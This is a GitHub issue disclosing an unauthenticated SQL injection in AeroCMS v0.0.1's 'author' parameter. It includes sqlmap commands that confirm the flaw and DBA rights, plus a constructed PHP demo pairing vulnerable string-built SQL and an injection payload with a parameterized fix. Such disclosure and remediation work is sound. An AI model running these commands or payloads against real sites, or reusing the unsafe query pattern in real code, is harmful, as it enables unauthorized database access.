This repository has been archived by the owner on May 8, 2023. It is now read-only.

AeroCMS v0.0.1 Frontend SQL Injection vulnerability #6

Open
w4n95 opened this issue Nov 27, 2022 · 0 comments

w4n95 commented Nov 27, 2022

  • Description

AeroCMS v0.0.1 was discovered to contain a SQL injection vulnerability via the "author" parameter at \author_posts.php. This vulnerability allows attackers, without authentication, to obtain database administrator privileges and access database information, etc.

  • Reproduction

  1. No login required. Execute the sqlmap command: python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author". We can see that a SQL injection vulnerability exists in the "author" parameter.

  2. Execute the sqlmap command: python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author" --is-dba. We can see "DBA: TRUE".

  • Vulnerable Code

The “author” parameter is not escaped before executing the SQL query statement.
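
The pattern the report describes, next to a parameterized version, as an added example that is not code from this issue or from AeroCMS. The table and column names, the sample rows and the test values are constructed, and an in-memory SQLite database via PDO stands in for the CMS's database so the script runs offline.

```php
<?php
// Added example: constructed schema and rows, not AeroCMS's real tables.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE posts (post_id INTEGER PRIMARY KEY, post_author TEXT, post_title TEXT)");
$db->exec("INSERT INTO posts (post_author, post_title) VALUES
    ('admin', 'Welcome'), ('alice', 'Draft notes'), ('bob', 'Private memo')");

// Pattern described in the report: the request value becomes part of the SQL text.
function posts_by_author_unsafe(PDO $db, string $author): array {
    $sql = "SELECT post_title FROM posts WHERE post_author = '" . $author . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: the SQL text is fixed and the value is bound as data.
function posts_by_author_safe(PDO $db, string $author): array {
    $stmt = $db->prepare("SELECT post_title FROM posts WHERE post_author = :author");
    $stmt->execute([':author' => $author]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Report the row count, or the fact that the database rejected the statement.
function row_count_or_error(callable $lookup): string {
    try {
        return count($lookup()) . ' row(s)';
    } catch (PDOException $e) {
        return 'SQL error';
    }
}

// Constructed inputs: a normal name, a legitimate name containing a quote,
// and a value that rewrites the WHERE clause when concatenated.
$inputs = ['admin', "o'brien", "nobody' OR '1'='1"];
foreach ($inputs as $author) {
    echo json_encode($author), "\n";
    echo '  unsafe: ', row_count_or_error(fn() => posts_by_author_unsafe($db, $author)), "\n";
    echo '  safe:   ', row_count_or_error(fn() => posts_by_author_safe($db, $author)), "\n";
}
```

The "DBA: TRUE" result in step 2 also means the application's database account has administrator rights; connecting with an account limited to the CMS's own tables reduces what any remaining injection can reach.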
